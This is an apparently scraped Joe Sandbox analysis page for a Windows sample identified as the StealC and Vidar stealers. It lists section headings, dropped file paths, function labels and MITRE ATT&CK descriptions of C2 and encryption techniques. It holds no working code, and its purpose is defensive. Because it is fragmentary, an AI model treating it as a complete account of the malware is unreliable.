Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report B7VbZC8QLf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CBAKJKJJ

C:\ProgramData\FCGCFCAFIIEBGCBFCAKKJKJJKK

C:\ProgramData\KKJKKJJKJEGIECAKJJEB

C:\Users\user\Desktop\BPMLNOBVSB.docx

C:\Users\user\Desktop\CURQNKVOIX.xlsx

C:\Users\user\Desktop\DUKNXICOZT.xlsx

C:\Users\user\Desktop\EFOYFBOLXA.docx

C:\Users\user\Desktop\EWZCVGNOWT.xlsx

C:\Users\user\Desktop\FENIVHOIKN.docx

C:\Users\user\Desktop\GAOBCVIQIJ.docx

C:\Users\user\Desktop\GAOBCVIQIJ.xlsx

C:\Users\user\Desktop\GIGIYTFFYT.docx

C:\Users\user\Desktop\NIKHQAIQAU.docx

Windows Analysis Report
B7VbZC8QLf.exe

Function 00409283 Relevance: 72.6, APIs: 38, Strings: 3, Instructions: 895
memoryregistrytimeCOMMON

Function 0040DE01 Relevance: 46.7, APIs: 31, Instructions: 159
libraryloaderCOMMON

Function 0040A802 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 211
filestringCOMMON

Function 0040B4FA Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 157
stringfileCOMMON

Function 0040AC23 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 132
stringfileCOMMON

Function 00406218 Relevance: 18.4, APIs: 12, Instructions: 378
fileCOMMON

Function 00401010 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 347
fileCOMMON

Function 00404CAA Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 112
memoryencryptionCOMMON

Function 0040D271 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80
memoryCOMMON

Function 00403657 Relevance: 10.6, APIs: 7, Instructions: 69
networkmemoryfileCOMMON

Function 00407D25 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 414
fileCOMMON

Function 0040D6D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
processCOMMON

Function 0040D983 Relevance: 6.0, APIs: 4, Instructions: 50
memoryencryptionCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre